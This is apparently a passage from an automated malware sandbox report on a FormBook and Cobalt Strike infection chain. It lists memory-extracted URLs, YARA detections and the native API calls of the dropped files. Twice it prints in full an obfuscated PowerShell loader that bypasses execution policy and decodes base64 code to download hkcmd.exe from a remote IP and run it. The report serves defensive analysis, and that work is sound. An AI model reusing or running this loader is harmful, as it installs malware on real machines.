82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                    Source: powershell.exe, 00000003.00000002.1021362956.00000000056E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/440/hkcmd.ex
                    Source: powershell.exe, 00000003.00000002.1054320799.0000000007A07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1054320799.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/440/hkcmd.exe
                    Source: powershell.exe, 00000003.00000002.1058546726.0000000008923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/440/hkcmd.exeGQ_8
                    Source: powershell.exe, 00000003.00000002.1054320799.0000000007A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/440/hkcmd.exeL
                    Source: powershell.exe, 00000003.00000002.1058546726.0000000008991000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/440/hkcmd.exeVVC:
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: powershell.exe, 00000003.00000002.1054191935.00000000079B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 00000003.00000002.1058546726.0000000008923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftE
                    Source: svchost.exe, 0000000F.00000002.2113621083.000001BFF0C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                    Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: edb.log.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/csca2020.crl0I
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/rootca2020.crl0?
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/tsca2020.crl0?
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/csca2020.crt05
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/rootca2020.crt07
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/tsca2020.crt05
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/csp0
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: hkcmd.exe, 00000006.00000002.1039105080.000000007EF59000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.984937213.0000000002B7A000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EBC9000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EB70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2116062584.0000000005DD5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shangaccurate.shop
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2116062584.0000000005DD5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shangaccurate.shop/3p3g/
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: powershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                    Source: svchost.exe, 0000000F.00000003.1204395481.000001BFF0AE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: systeminfo.exe, 0000000E.00000002.2107718363.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: systeminfo.exe, 0000000E.00000002.2107718363.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: systeminfo.exe, 0000000E.00000002.2107718363.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: systeminfo.exe, 0000000E.00000002.2107718363.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033-
                    Source: systeminfo.exe, 0000000E.00000002.2107718363.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: systeminfo.exe, 0000000E.00000002.2107718363.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: systeminfo.exe, 0000000E.00000003.1381046854.0000000007EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: powershell.exe, 00000003.00000002.1054320799.0000000007A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/UEV/icrosoft.Uev.Commands.dll
                    Source: powershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: qmgr.db.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 0000000E.00000002.2110369857.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2107211375.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2110518882.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202792315.0000000005460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2111063541.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2116062584.0000000005D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202895783.00000000073A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1223919128.000000002C7F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hkcmd.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43208 NtAllocateVirtualMemory,6_2_02F43208
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4A0AC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,6_2_02F4A0AC
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4A024 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,6_2_02F4A024
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4A190 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,6_2_02F4A190
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43554 NtWriteVirtualMemory,6_2_02F43554
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F47EF8 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,6_2_02F47EF8
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43206 NtAllocateVirtualMemory,6_2_02F43206
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F45634 GetThreadContext,SetThreadContext,NtResumeThread,6_2_02F45634
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F45632 GetThreadContext,SetThreadContext,NtResumeThread,6_2_02F45632
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43B70 NtProtectVirtualMemory,6_2_02F43B70
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F49FD0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,6_2_02F49FD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_2C512C70
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_2C512DF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512B60 NtClose,LdrInitializeThunk,11_2_2C512B60
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5135C0 NtCreateMutant,LdrInitializeThunk,11_2_2C5135C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512C60 NtCreateKey,11_2_2C512C60
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512C00 NtQueryInformationProcess,11_2_2C512C00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512CC0 NtQueryVirtualMemory,11_2_2C512CC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512CF0 NtOpenProcess,11_2_2C512CF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512CA0 NtQueryInformationToken,11_2_2C512CA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C513D70 NtOpenThread,11_2_2C513D70
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C513D10 NtOpenProcessToken,11_2_2C513D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512D10 NtMapViewOfSection,11_2_2C512D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512D00 NtSetInformationFile,11_2_2C512D00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512D30 NtUnmapViewOfSection,11_2_2C512D30
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512DD0 NtDelayExecution,11_2_2C512DD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512DB0 NtEnumerateKey,11_2_2C512DB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512E30 NtWriteVirtualMemory,11_2_2C512E30
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512EE0 NtQueueApcThread,11_2_2C512EE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512E80 NtReadVirtualMemory,11_2_2C512E80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512EA0 NtAdjustPrivilegesToken,11_2_2C512EA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512F60 NtCreateProcessEx,11_2_2C512F60
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512F30 NtCreateSection,11_2_2C512F30
